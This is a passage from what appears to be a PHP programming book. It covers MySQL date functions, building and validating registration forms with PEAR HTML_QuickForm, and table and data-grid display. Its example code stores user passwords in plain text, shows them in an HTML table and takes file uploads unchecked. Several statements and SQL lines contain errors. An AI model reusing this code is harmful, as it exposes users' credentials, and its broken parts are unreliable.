  • 133. Dates and Times 109 Timestamps in this form are perfect for simple sorting and comparison operations, and they have the advantage of being human-readable. They also have a predictable length (until we get to the year 9999), which makes them easier to validate. You can take advantage of the many native MySQL date and time functions via the native MySQL DATETIME column type, which is also easy to convert to a Unix timestamp if required. How do I format MySQL timestamps? MySQL timestamps, while human-readable, are not exactly human-friendly—you probably wouldn’t use them on your birthday party invitations, for example. Instead of 2008-02-14 13:00:00 I’m sure you’d much prefer to write “February 14th, 2008 at 1 p.m.” Lucky for us, making MySQL timestamps human-friendly is extremely easy—your party invitations will look great. I promise! Solution MySQL, like PHP, has a date formatting function which, aptly, is named the DATE_FORMAT function. To use this function, we simply pass a format string and a timestamp as follows: mysql> SELECT DATE_FORMAT(NOW(), "%W %M %D, %Y"); +------------------------------------+ | DATE_FORMAT(NOW(), "%W %M %D, %Y") | +------------------------------------+ | Monday October 8th, 2007 | +------------------------------------+
  • 134. 110 The PHP Anthology Table 4.2. DATE_FORMAT Specifiers Specifier Description %a abbreviated weekday name (Sun … Sat) %b abbreviated month name (Jan … Dec) %c month, numeric (0 … 12) %d day of the month with English suffix (0th, 1st, 2nd, 3rd, …) %D day of the month, numeric (00 … 31) %e day of the month, numeric (0 … 31) %f microseconds (000000 … 999999) %H or %k hour (00 … 23) %h, %I, or %l hour (01 … 12) %i minutes, numeric (00..59) %M month name (January..December) %m month, numeric (00..12) %p a.m. or p.m. %r time, 12-hour (hh:mm:ss followed by a.m. or p.m.) %S or %s seconds (00 … 59) %T time, 24-hour (hh:mm:ss) %W weekday name (Sunday … Saturday) %w day of the week (0=Sunday … 6=Saturday) %Y year, numeric, four digits %y year, numeric (two digits) %% a literal % character Much like the PHP date function, the DATE_FORMAT function uses a format string containing specifiers to define the formatting. A list of commonly used specifiers can be seen in Table 4.2.
  • 135. Dates and Times 111 How do I perform date calculations using MySQL? When performing queries, it’s not uncommon to find the need for date range spe­ cification. You may, for example, need to retrieve all blog posts created within the last 30 days. Date calculations are a breeze in MySQL; let’s have a look at them. Solution You can perform complex date math using the MySQL date functions. We can add and subtract time intervals that are identified using the INTERVAL keyword via the DATE_ADD and DATE_SUB functions. Thus, we use DATE_ADD to add one day: mysql> SELECT DATE_ADD(NOW(), INTERVAL 1 DAY); +---------------------------------+ | DATE_ADD(NOW(), INTERVAL 1 DAY) | +---------------------------------+ | 2007-10-09 21:32:20 | +---------------------------------+ Likewise, we use DATE_SUB to subtract one day: mysql> SELECT DATE_SUB(NOW(), INTERVAL 1 DAY); +---------------------------------+ | DATE_SUB(NOW(), INTERVAL 1 DAY) | +---------------------------------+ | 2007-10-07 21:32:26 | +---------------------------------+ We can also add or subtract months and years: mysql> SELECT DATE_ADD(NOW(), INTERVAL 1 MONTH); +-----------------------------------+ | DATE_ADD(NOW(), INTERVAL 1 MONTH) | +-----------------------------------+ | 2007-11-08 21:31:05 | +-----------------------------------+ mysql> SELECT DATE_SUB(NOW(), INTERVAL 1 MONTH); +-----------------------------------+ | DATE_SUB(NOW(), INTERVAL 1 MONTH) |
  • 136. 112 The PHP Anthology +-----------------------------------+ | 2007-09-08 21:31:55 | +-----------------------------------+ mysql> SELECT DATE_ADD(NOW(), INTERVAL 1 YEAR); +----------------------------------+ | DATE_ADD(NOW(), INTERVAL 1 YEAR) | +----------------------------------+ | 2008-10-08 21:32:31 | +----------------------------------+ mysql> SELECT DATE_SUB(NOW(), INTERVAL 1 YEAR); +----------------------------------+ | DATE_SUB(NOW(), INTERVAL 1 YEAR) | +----------------------------------+ | 2006-10-08 21:32:37 | +----------------------------------+ We can use more human-friendly terms when writing SQL queries in MySQL—such as 1 DAY, 1 MONTH, and 1 YEAR—than when we deal with Unix timestamps, which are measured in milliseconds. With MySQL, we can use the DATE_SUB and DATE_ADD functions to retrieve database records within a certain date range. Here, we get all the data with an updated_date within the last 30 days: SELECT * FROM my_table WHERE ➥ DATE_SUB(NOW(), INTERVAL 30 DAYS) >= updated_date; Similarly, the following will yield the rows with an updated_date that’s more than one week old, but no more than 14 days old: SELECT * FROM my_table WHERE ➥ updated_date BETWEEN(DATE_SUB(NOW(), INTERVAL 14 DAYS), ➥ DATE_SUB(NOW(), INTERVAL 7 DAYS); As you can see, MySQL date functions make it incredibly easy to calculate dates, thanks to the use of human-friendly terms. Summary In this chapter, we’ve investigated the use of Unix timestamps and the flexibility of the PHP strtotime and date functions, so that we can complete almost any job
  • 137. Dates and Times 113 involving dates and times without raising a sweat. We’ve also seen that MySQL offers a range of date functions, which offer similar capabilities to those available in PHP, by combining DATE_SUB or DATE_ADD with the INTERVAL keyword. You may be wondering which approach you should take in making your own date calculations—should you use the PHP functions or try the MySQL functions? The decision is an easy one: when the timestamps are stored in a database, it’s quicker to use the MySQL method. However, as we saw in the calendar example in this chapter, when the timestamps don’t originate in the database, it’s quicker to use the PHP approach. None of us can escape the relentless march of time, but when we harness the power of the PHP date functions we can, at least, master time calculations and presentation. Functions like strtotime and date may seem simplistic at first glance, but can be used with great sophistication in your web applications.
  • 139. 5 Chapter Forms, Tables, and Pretty URLs Creating interactive web pages is what PHP is all about. As you use PHP to build web sites and applications, you’ll quickly notice that you’re called upon to develop the same web page elements over and over. When you’re working on your first PHP web site, writing a script to generate an HTML table may not seem like a huge problem, but give it time: after you’ve put together a few sites and have had to go back to modify your past efforts again and again, working on tables won’t seem so rosy. Eventually, the mere mention of the word “maintenance” may well have you gasping “Not another table!” as you weep quietly into your keyboard. Fear not—help is at hand! Not all HTML is the same, yet there are obvious common­ alities between HTML elements. These commonalities make the perfect targets for PHP’s classes, which allow you to eliminate repetitive work and concentrate on the creative aspects of programming that you enjoy. In this chapter, we’ll provide solutions for some of the most common tasks: building forms, building tables, and creating pretty URLs. In the process, we’ll make extensive
  • 140. 116 The PHP Anthology use of some of PEAR’s HTML packages—as a step up from hand coding your own HTML forms and tables, PEAR represents excellent value. Some of the examples we’ll discuss here will use the following database tables. First up, a table for users: chapter_05.sql (excerpt) CREATE TABLE user ( id INT(11) NOT NULL AUTO_INCREMENT, login VARCHAR(50) NOT NULL DEFAULT '', password VARCHAR(50) NOT NULL DEFAULT '', email VARCHAR(50) DEFAULT NULL, first_name VARCHAR(50) DEFAULT NULL, last_name VARCHAR(50) DEFAULT NULL, signature TEXT NOT NULL, PRIMARY KEY (id), UNIQUE KEY user_login (login) ); We’ll also use this table to store images: chapter_05.sql (excerpt) CREATE TABLE user_images ( image_id INT(11) NOT NULL AUTO_INCREMENT, user_id INT(11) NOT NULL, type VARCHAR(50) NOT NULL DEFAULT '', filename VARCHAR(32) NOT NULL, PRIMARY KEY (image_id) ); How do I build HTML forms with PHP? HTML forms are the key input mechanism for user data on a web site. As web de­ velopers, we must handle several facets of HTML forms: ■ form generation ■ form validation ■ retrieving valid form data ■ repopulating invalid forms with submitted data
  • 141. Forms, Tables, and Pretty URLs 117 Solution Thankfully, PEAR comes to the rescue with HTML_QuickForm,1 which aims to do exactly as its name states—make forms quickly. HTML_QuickForm can help to auto­ mate all the tasks associated with form building. Using HTML_QuickForm2 At the time of writing, PEAR had released an alpha version of the HTML_QuickForm2 class.2 This new version is written specifically for PHP 5 and is compatible with the E_STRICT level of error reporting. Our first example demonstrates how easy it is to build a registration form using the HTML_QuickForm class. We begin our form by including the HTML/QuickForm.php file and instantiating our HTML_QuickForm object: htmlForm.php (excerpt) <?php require_once 'HTML/QuickForm.php'; $form = new HTML_QuickForm('Create', 'post', basename(__FILE__)); The arguments supplied to the constructor represent the form’s name, method, and action HTML attributes. Next, we start to add the required form elements using the addElement method: htmlForm.php (excerpt) $opts = array('size' => 20, 'maxlength' => 255); $form->addElement('static', 'header', null, '<h1>Register</h1>' ); $form->addElement('text', 'first_name', 'First Name', $opts); $form->addElement('text', 'last_name', 'Last Name', $opts); $form->addElement('text', 'login', 'Login Name', $opts); $form->addElement('password', 'password', 'Password', $opts); $form->addElement('text', 'email', 'E-Mail', $opts); 1 http://pear.php.net/package/HTML_QuickForm/ 2 http://pear.php.net/package/HTML_QuickForm2/
  • 142. 118 The PHP Anthology $form->addElement('static', 'valid', null, '<strong>E-Mail address must be valid, and will only be'. ' used for account verification.</strong>' ); $form->addElement('textarea', 'signature', 'Signature', array('rows' => 10, 'cols' => 20)); $form->addElement('file', 'avatar', 'Avatar Image'); $form->addElement('static', 'reqs', null, '<strong>Image <em>must</em> be no more than 64x64 pixels' . ' in size.</strong>' ); $form->addElement('submit', 'register', "Register Now!"); The first argument passed to the addElement method represents the element type. Many element types are possible, and each is represented by a PHP class—the full list is available on the “QuickForm element types” PEAR documentation page.3 The element types we’ve used above include static, which represents static HTML content that’s not submitted with the form. We’ve used static elements for the heading and form help text. The other types we’ve used include text, password, textarea, file, and submit; each represents its respective HTML form element equivalent. The remaining arguments, which we’ve passed to the addElement method, are subsequently passed to the constructor methods of the appropriate type classes and, as such, are specific to those classes. The “QuickForm element types” PEAR docu­ mentation page has all the details you’ll need to use these classes.4 After we’ve added the form elements, we can obtain the form HTML source using the toHTML method: htmlForm.php (excerpt) $formsource = $form->toHtml(); ?> The only thing that’s left to do is add the form source to a web page: 3 http://pear.php.net/manual/en/package.html.html-quickform.intro-elements.php 4 http://pear.php.net/manual/en/package.html.html-quickform.intro-elements.php
  • 143. Forms, Tables, and Pretty URLs 119 htmlForm.php (excerpt) <!DOCTYPE html public "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> ⋮ HTML head contents… </head> <body> <?php echo $formsource; ?> </body> </html> That code above will render as shown in Figure 5.1. Figure 5.1. Our first registration form
  • 144. 120 The PHP Anthology As you can see, this form really doesn’t do much, and apart from that fact that it was slightly easier to build this form than to hand-code the HTML, you might be forgiven for asking, “What’s all the fuss about?” Well, as you’ll see in the next ex­ ample, we can add complex validation rules to the form with a minimum of fuss and bother. We use the addRule method to add validation rules to the form:5 htmlFormValidation.php (excerpt) $form->addRule('first_name', 'You must enter your first name', 'required', null, 'client' ); $form->addRule('first_name', 'Your first name must be at least 3 letters', 'minlength', '3', 'client' ); The first argument to the addRule method is the form element name, which is fol­ lowed by the error message. The next argument indicates the type of validation re­ quired, and includes an extra, optional argument for the validation type, and an optional indication of where the validation should occur; this setting can specify client or server. If it specifies client, JavaScript validation is added to the form to support the rule. You may have noticed in the code above that you can add multiple rules for a single form element. We can see that the first rule in the code above is a required rule, which indicates that the field cannot be blank. As no arguments are required for this rule, the next argument is null. The final argument indicates the validation is to occur on the client, that is, the browser. The second rule is a minlength rule and the optional argument indicates that the first_name field value has a minimum length of 3 characters. We’re not limited to only those rules, however. Many other validation types are available, and they’re all handily documented on the PEAR web site.6 Let’s go ahead and add more rules for the remaining elements: 5 http://pear.php.net/manual/en/package.html.html-quickform.html-quickform.addrule.php 6 http://pear.php.net/manual/en/package.html.html-quickform.intro-validation.php
  • 145. Forms, Tables, and Pretty URLs 121 htmlFormValidation.php (excerpt) $form->addRule('last_name', 'You must enter your last name', 'required', null, 'client' ); $form->addRule('last_name', 'Your last name must be at least 3 letters', 'minlength', '3', 'client' ); $form->addRule('email', 'You must enter your email address', 'required', null, 'client' ); $form->addRule('email', 'Please enter a valid email address', 'email', FALSE, 'client' ); $form->addRule('login', 'You must enter a login name', 'required', null, 'client' ); $form->addRule('login', 'Your login name must be between 6-20 characters long', 'rangelength', array(6, 20), 'client' ); $form->addRule('password', 'You must enter a password', 'required', null, 'client' ); $form->addRule('password', 'Your Password must be at least 6 characters long.', 'minlength', '6', 'client' ); Now that we’ve added these rules, we can add some form handling code:
  • 146. 122 The PHP Anthology htmlFormValidation.php (excerpt) if ($form->validate()) { $form->removeElement('validemail'); $form->removeElement('reqs'); $form->removeElement('avatar'); $form->removeElement('register'); $form->freeze(); $formsource = $form->toHtml(); } else { $formsource = $form->toHtml(); } ?> The validate method allows us to check to see whether or not the form has been submitted, and passed all the validation requirements. If the form validates, you can add code at this step to manipulate the form data in some way—to save it to a database, for example. For the purposes of our example solution, we freeze the form and display it again. Elements that are frozen only display their values—not the editable form element. Of course, this makes no difference to static elements and buttons, so we remove those elements from the form before we freeze it. Using the freeze method to freeze the form allows us to add a confirmation step to the form submission process, which gives users a chance to review their information before they submit it. If the form has not passed validation, we simply display its HTML source. This step is also taken if the form has not yet been submitted. If validation errors have been detected, the validation rule error messages will be added to the form’s HTML source. You can see the rendered form in Figure 5.2. Notice how the presence of the valid­ ation rules has automatically inserted required field indicators. That image also shows the error message that was added by the server-side validation mechan­ ism—you’ll have to disable JavaScript in your browser to see this message yourself. Figure 5.3 shows the frozen form.
  • 147. Forms, Tables, and Pretty URLs 123 Figure 5.2. The registration form with validation mechanisms
  • 148. 124 The PHP Anthology Figure 5.3. The frozen registration form Now that we’ve validated the data submitted by our users, we need to accept and store it. Let’s look at an alternative to the above example, in which we extract the form data and insert it into our database. To extract the submitted data from the form, we simply use the exportValues method: htmlFormExport.php (excerpt) if ($form->validate()) { $values = $form->exportValues(); Now that we have our form data, we can make a database connection and insert it into the database: htmlFormExport.php (excerpt) require 'dbcred.php'; try { $db = new PDO($dsn, $user, $password); $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION); $sql = 'INSERT INTO user ' . '(login, password, email, first_name, last_name,' .
  • 149. Forms, Tables, and Pretty URLs 125 ' signature) VALUES (:login, :password, :email,' . ' :firstname, :lastname, :sig)'; $stmt = $db->prepare($sql); $stmt->bindParam(':login', $values['login']); $stmt->bindParam(':password', $values['password']); $stmt->bindParam(':email', $values['email']); $stmt->bindParam(':firstname', $values['first_name']); $stmt->bindParam(':lastname', $values['last_name']); $stmt->bindParam(':sig', $values['signature']); $stmt->execute(); First, we insert the registration information into the user table. Using PDO and the prepare and execute methods with bound parameters allows us to safely use the form data in our SQL query. For more information about this technique, have a look at “How do I add data to, or modify data in, my database?” in Chapter 2. Next, we obtain the insert ID from the previous database insert operation; we’ll need this in a moment. The $form->_submitFiles property contains an array of files that were submitted with the form. We can use this information to gain access to the avatar image file, and move it to the avatar directory, applying a unique filename to it at the same time: htmlFormExport.php (excerpt) $id = $db->lastInsertId(); $type = $form->_submitFiles['avatar']['type']; $file = 'images/avatars/' . md5(microtime()) . basename($form->_submitFiles['avatar']['name']); move_uploaded_file( $form->_submitFiles['avatar']['tmp_name'], $file ); We also need to insert this image file information into the user_image table. This is a great opportunity to use that insert ID we saved in the previous operation:
  • 150. 126 The PHP Anthology htmlFormExport.php (excerpt) $sql = 'INSERT INTO user_images' . ' (user_id, type, filename) VALUES' . ' (:id, :type, :file)'; $stmt = $db->prepare($sql); $stmt->bindParam(':id', $id); $stmt->bindParam(':type', $type); $stmt->bindParam(':file', $file); $stmt->execute(); Our final task is to create the confirmation display: htmlFormExport.php (excerpt) $form->removeElement('validemail'); $form->removeElement('reqs'); $form->removeElement('avatar'); $form->removeElement('register'); $form->freeze(); $formsource = $form->toHtml() . '<p>The above information has ➥ been successfully submitted</p>'; } If, however, a database exception occurred, we’ll need to log the error and create the error message display: htmlFormExport.php (excerpt) catch(PDOException $e) { error_log('Registraiton form error: '. $e->getMessage()); $form->removeElement('validemail'); $form->removeElement('reqs'); $form->removeElement('avatar'); $form->removeElement('register'); $form->freeze(); $formsource = $form->toHtml() . '<p>An error has occurred. The ➥ above information was not successfully submitted</p>'; } }
  • 151. Forms, Tables, and Pretty URLs 127 Finally, as usual, if the form hasn’t been submitted, we just display it: htmlFormExport.php (excerpt) else { $formsource = $form->toHtml(); } Using the HTML_QuickForm class allows you to quickly and efficiently add web page forms to your web site or web application with a minimum of fuss. Make sure you check out the PEAR documentation to discover all the other functionality available in the class.7 How do I display data in a table? Tables are an integral part of data display, which—let’s face it—is an integral part of most web pages! So how do you easily display your data in a table, in a way that automates most of the boring, repetitive pieces of table HTML you have to write? Solution The answer to this question is to use PEAR’s HTML_Table class.8 In this example, we’ll use HTML_Table to display the results of a simple SQL query. First, we need to include the required PHP files: pearTable.php (excerpt) <?php require 'dbcred.php'; require 'HTML/Table.php'; dbcred.php contains our database login credentials for use with PDO. The file contains credentials relevant to our testing environment, so you’ll need to change them should you wish to try this on your own web server. HTML/Table.php contains the HTML_Table class. 7 http://pear.php.net/package/HTML_QuickForm/ 8 http://pear.php.net/manual/en/package.html.html-table.php
  • 152. 128 The PHP Anthology Next, we instantiate our PDO object and perform the SQL query. We open a try block to catch any PDOExceptions that may occur: pearTable.php (excerpt) try { $db = new PDO($dsn, $user, $password); $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION); $sql = "SELECT * FROM user"; $stmt = $db->prepare($sql); $stmt->execute(); The creation of the table is simple. We instantiate the HTML_Table object and call the setAutoGrow method, which activates a flag instructing HTML_Table to automat­ ically add rows and columns when data is added into a non-existent cell. We then call the addRow method to add a header row: pearTable.php (excerpt) $table = new HTML_Table; $table->setAutoGrow(true); $table->addRow(array("","Login","Password","E-Mail", "First Name","Last Name","Signature"), null, "th"); That row addition is followed by a while loop in which we call the addRow method to add the query results. The addRow method accepts an indexed array as an argument for the row content, so we need to call PDOStatement->fetch with the PDO::FETCH_NUM argument to make PDO return our row data as an indexed array. Finally, we call toHTML to assign the table HTML source to a variable: pearTable.php (excerpt) while ($row = $stmt->fetch(PDO::FETCH_NUM)) { $table->addRow($row); }
  • 153. Forms, Tables, and Pretty URLs 129 $tablesource = $table->toHTML(); } Our catch block simply logs any errors and sets the $tablesource variable to an empty string, thus avoiding outputting any cryptic error messages to our web page users: pearTable.php (excerpt) catch (PDOException $e) { error_log('Error in '.$e->getFile(). ' Line: '.$e->getLine(). ' Error: '.$e->getMessage() ); $tablesource = ""; } ?> The $tablesource variable can now be used in the web page output: pearTable.php (excerpt) <!DOCTYPE html public "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> ⋮ HTML head contents… </head> <body> <h1>PEAR::HTML_Table</h1> <?php echo $tablesource ?> </body> </html> And we’re done! HTML_Table is a great time saver for outputting tabular data.
  • 154. 130 The PHP Anthology How do I display data in a sortable table? Usually there’s more to displaying tabular data than just putting it in a table. If you have large data sets, you might like to add user interface controls like column sorting or paging to your tables, so that your users can easily digest the content in small chunks. Solution The PEAR Structures_DataGrid class is more than capable of handling the job.9 Structures_DataGrid has more features than I can list here—we’ll only be using a few of them in our solution, which builds an HTML table with column sorting and paging controls. This solution also requires several PEAR packages to function properly. They are: Structures_DataGrid_DataSource_MDB2,10 11 12 MDB2_Driver_mysql, Structures_DataGrid_Renderer_HTMLTable, and 13 Structures_DataGrid_Renderer_Pager. Once we’ve made sure all those PEAR packages are installed, we can get started on the solution. First, we need to include the required PHP files: pearDataGrid.php (excerpt) <?php require 'dbcred.php'; require 'Structures/DataGrid.php'; dbcred.php contains our database login credentials, which we’ll use with our Structures_DataGrid object. The file contains credentials relevant to our testing environment, so you’ll need to change them to suit should you wish to try this on your own web server. Structures/DataGrid.php is required to create our Structures_DataGrid object. The next step is to instantiate our Structures_DataGrid object and bind it to the SQL query: 9 http://pear.php.net/package/Structures_DataGrid/ 10 http://pear.php.net/package/Structures_DataGrid_DataSource_MDB2/ 11 http://pear.php.net/package/MDB2_Driver_mysql/ 12 http://pear.php.net/package/Structures_DataGrid_Renderer_HTMLTable/ 13 http://pear.php.net/package/Structures_DataGrid_Renderer_Pager/
  • 155. Forms, Tables, and Pretty URLs 131 pearDataGrid.php (excerpt) $datagrid = new Structures_DataGrid(2); $options = array( 'dsn' => "mysql://$user:$password@$db_host/$db_name"); $sql = "SELECT * FROM user"; $bind = $datagrid->bind($sql, $options); if (PEAR::isError($bind)) { error_log('DataGrid Error: '. $bind->getMessage()); $gridsource = ''; } We instantiate the grid, specifying that each page should display two rows. We then bind the grid to the SQL query using the bind method. We pass database information in the $options array to enable our Structures_DataGrid object to automatically choose the correct database driver to use, and make a connection. We check for errors that may have been generated from the bind method call using the PEAR::isError method, and if we detect an error, we make sure to log it and set our $gridsource variable to an empty string. This will ensure that the displayed web page will not contain any cryptic error messages. If no errors are reported, we can proceed to build our grid. We start by defining the columns and setting rendering options for the grid: pearDataGrid.php (excerpt) else { $columns = array( 'first_name' => 'First Name', 'last_name' => 'Last Name', 'email' => 'E-Mail', 'login' => 'Login Name', 'signature' => 'Signature', ); $datagrid->generateColumns($columns); $renderer_options = array( 'sortIconASC' => '&uArr;', 'sortIconDESC' => '&dArr;',
  • 156. 132 The PHP Anthology 'headerAttributes' => array('bgcolor' => '#E3E3E3'), 'evenRowAttributes' => array('bgcolor' => '#A6A6A6'), ); $datagrid->setRendererOptions($renderer_options); $renderer = $datagrid->getRenderer(); $renderer->setTableAttribute('cellspacing', 0); $renderer->setTableAttribute('cellpadding', 5); $renderer->setTableAttribute('border', 1); To generate the columns of our grid, we call the convenient generateColumns method. All we have to do is supply an array that maps our SQL field names to column labels—Structures_DataGrid will do the rest. Next, we retrieve the HTML source of our grid and pager using the getOutput method, and store it in the $gridsource variable: pearDataGrid.php (excerpt) $gridbody = $datagrid->getOutput(); if (PEAR::isError($gridbody)) { error_log('DataGrid render error: ' . $gridbody->getMessage()); $gridbody = ''; } $gridpager = $datagrid->getOutput(DATAGRID_RENDER_PAGER); if (PEAR::isError($gridpager)) { error_log('DataGrid render error: ' . $gridpager->getMessage()); $gridpager = ''; } $gridsource = $gridbody . $gridpager; } ?> When we call the getOutput method, we make sure to test the return value for errors and take appropriate action. Finally, our grid can be output to a web page:
  • 157. Forms, Tables, and Pretty URLs 133 pearDataGrid.php (excerpt) <!DOCTYPE html public "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> ⋮ HTML head contents… </head> <body> <h1>PEAR::Structures_DataGrid</h1> <?php echo $gridsource ?> </body> </html> With these scant few lines of code, we can generate a dynamic table that will auto­ matically allow users to order the data by clicking on each column’s header, and will automatically implement dynamic paging. The resulting output can be seen in Figure 5.4. Figure 5.4. Structures_DataGrid in action As we can see, Structures_DataGrid handles a huge amount of the work necessary to generate a very feature-rich table, including modifying the SQL query to incor­ porate ordering and paging, and making sure that the icon to denote ordering direc­ tion is shown correctly.
  • 158. 134 The PHP Anthology How do I create a customized data grid? Showing tabular data in a table seems fairly straightforward, but when the tables are part of a web application, customization is often required. For example, you might want to display a list of member information in a tabular format, customizing one column to display members’ avatar thumbnails. Solution The Structures_DataGrid class allows you to specify formatter function callbacks to customize the data shown in a table. In this solution, we’ll add customized columns for the members’ names and avatars. Make sure you check out “How do I display data in a sortable table?” in this chapter to make sure you have everything on the list of required PEAR packages. The first step is to include the required PHP files: pearDataGridCustom.php (excerpt) <?php require 'dbcred.php'; require 'Structures/DataGrid.php'; dbcred.php contains the database login credentials for use with our Structures_DataGrid object. The file contains credentials relevant to our testing environment, so be sure to change them should you wish to try this on your own web server. Structures/DataGrid.php is required to create our Structures_DataGrid object. Next, we define some custom callback functions, getName, and getThumbnail: pearDataGridCustom.php (excerpt) function getName($data) { return $data['record']['first_name'] .' '. $data['record']['last_name']; } function getThumbnail($data)
  • 159. Forms, Tables, and Pretty URLs 135 { if (strlen($data['record']['filename']) > 0) { return '<img src="images/avatars/' .$data['record']['filename']. '" />'; } else { return '<img src="images/avatars/missing.gif" />'; } } The first function, getName, simply concatenates the first_name and last_name columns. getThumbnail returns an HTML <img> tag using the filename column. When a callback function is called, it’s passed as an argument to an array that con­ tains the database row as well as some information about the column in question: the current ordering and the row number. Callback functions must return the string to be displayed in the column. We then instantiate our Structures_DataGrid object and create a series of Struc­ tures_DataGrid_Column objects, each of which represents a display column. We add them to our grid object using the addColumn method: pearDataGridCustom.php (excerpt) $datagrid = new Structures_DataGrid(2); $thumb = new Structures_DataGrid_Column("", "thumb", "thumb", null, null, "getThumbnail()"); $datagrid->addColumn($thumb); $name = new Structures_DataGrid_Column("Name", "name", "first_name", null, null, "getName()"); $datagrid->addColumn($name); $email = new Structures_DataGrid_Column("E-Mail", "email", "email"); $datagrid->addColumn($email); $login = new Structures_DataGrid_Column("Login Name", "login", "login"); $datagrid->addColumn($login);
  • 160. 136 The PHP Anthology $sig = new Structures_DataGrid_Column("Signature", "signature", "signature"); $datagrid->addColumn($sig); $datagrid->setDefaultSort(array('first_name' => 'ASC')); We also set the default ordering of the data so that it’s arranged by first name, in ascending (alphabetical) order. The code skeleton for the Structures_DataG­ rid_Column constructor is shown below: Structures_DataGrid_Column( string $label, [string $field = null], [string $orderBy = null], [array $attributes = array()], [string $autoFillValue = null], [mixed $formatter = null], [array $formatterArgs = array()] ); Our custom column code above displays two important code features: the custom formatter functions for the $thumb and $name columns (specified in their last argu­ ments), and the orderBy argument for the $name column. In the case of the $name column, the orderBy argument is important because when we concatenate the two names together, we can no longer sort by one or the other. As such, we have to supply either a column name or an expression on which to sort. In our solution, we’ve chosen to sort by the first name. Next, we bind the grid to the SQL query using the bind method: pearDataGridCustom.php (excerpt) $options = array( 'dsn' => "mysql://$user:$password@$db_host/$db_name"); $sql = "SELECT DISTINCT * FROM user". " LEFT JOIN user_images". " ON user.id = user_images.user_id"; $bind = $datagrid->bind($sql, $options); if (PEAR::isError($bind))
  • 161. Forms, Tables, and Pretty URLs 137 { error_log('DataGrid Error: '. $bind->getMessage()); $gridsource = ''; } We pass database information in the $options array so that our Structures_DataGrid object will be able to automatically choose the correct database driver to use and make a connection. We check for errors generated from the bind method call using the PEAR::isError method, and if we detect an error, we make sure to log it and set our $gridsource variable to an empty string. This ensures that the displayed web page will not contain any cryptic error messages. If no errors arise, we can proceed to customize the appearance our grid. We add new icons to show the ordering direction, set custom colors for the header row and the alternate row color, and specify some custom table attributes: pearDataGridCustom.php (excerpt) else { $renderer_options = array( 'sortIconASC' => '<img src="images/up.gif" />', 'sortIconDESC' => '<img src="images/down.gif" />', 'headerAttributes' => array('bgcolor' => '#E3E3E3'), 'evenRowAttributes' => array('bgcolor' => '#A6A6A6'), ); $datagrid->setRendererOptions($renderer_options); $renderer = $datagrid->getRenderer(); $renderer->setTableAttribute('cellspacing', 0); $renderer->setTableAttribute('cellpadding', 5); $renderer->setTableAttribute('border', 1); We then retrieve the HTML source of our grid and pager using the getOutput method, and store it in the $gridsource variable:
  • 162. 138 The PHP Anthology pearDataGridCustom.php (excerpt) $gridbody = $datagrid->getOutput(); if (PEAR::isError($gridbody)) { error_log('DataGrid render error: ' . $gridbody->getMessage()); $gridbody = ''; } // Finally, render the pager, again checking for errors $gridpager = $datagrid->getOutput(DATAGRID_RENDER_PAGER); if (PEAR::isError($gridpager)) { error_log('DataGrid render error: ' . $gridpager->getMessage()); $gridpager = ''; } $gridsource = $gridbody . $gridpager; } ?> When we call the getOutput method, we make sure to test the return value for errors and take appropriate action. Finally, our grid can be output in a web page: pearDataGridCustom.php (excerpt) <!DOCTYPE html public "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> ⋮ HTML head contents… </head> <body> <h1>PEAR::Structures_DataGrid, Customized!</h1> <?php echo $gridsource ?> </body> </html> We can see the resulting output in Figure 5.5.
  • 163. Forms, Tables, and Pretty URLs 139 Figure 5.5. The customized data grid How do I make “pretty” URLs in PHP? One of the first things every PHP developer learns is the concept of GET, or query string, arguments—the variables attached to the end of a URL, which allow the sending of arbitrary data to your PHP script. However, it quickly becomes apparent that URLs with lots of query string arguments are quite ugly. In years past there has been much talk about the importance of creating search engine friendly URLs, but in reality, this is a myth—any modern spider (Google or Yahoo! for example) will index URLs that make use of query string arguments. The most compelling argument for the practice now is “pretty” URLs—URLs that are both human-readable and easily memorable. What would you prefer to see: http://example.org/index.php?action=edit&item=163&what=trackbacks Or: http://example.org/edit/trackbacks/for/163-My-Example-Page Pretty URLs most often consist of three types of elements: the action (/edit), the type of action (/trackbacks), and one or more key-value pairs (/for/163-My-Example-Page).
  • 164. 140 The PHP Anthology Solutions Apache provides us with several options for creating pretty URLs: AcceptPathInfo, MultiViews and mod_rewrite. Pretty URLs with AcceptPathInfo AcceptPathInfo is an Apache2 Directive that controls whether requests that have a path appended to a filename will be accepted or rejected.14 If it’s enabled, the path information is made available to PHP in the $_SERVER['PATH_INFO'] variable. This facility is usually available to PHP because Apache allows the PHP interpreter module to specify that this option is turned on. AcceptPathInfo lets us create URLs like this: http://example.org/index.php/edit/trackbacks/for/163-My-Example-Page This is an improvement on the URL we saw above, but it’s still not entirely pretty, as it contains a filename that people must remember, and which is superfluous to the URL. Pretty URLs with MultiViews We can go part of the way to remedying the problem of URLs containing filenames using AcceptPathInfo in conjunction with the the MultiViews option.15 MultiViews is used for content negotiation, which means that it can be used to send a French translation of a resource to browser clients set to prefer reading French, or a GIF version of an image to browser clients set to prefer GIF over the JPEG format (or cannot render JPEG format images, for example). MultiViews offers the side-effect of allowing us to reference files without their ex­ tensions. We enable it using the following in an .htaccess file or in the httpd.conf: Options MultiViews We can now use the following URL: http://example.org/index/edit/trackbacks/for/163-My-Example-Page 14 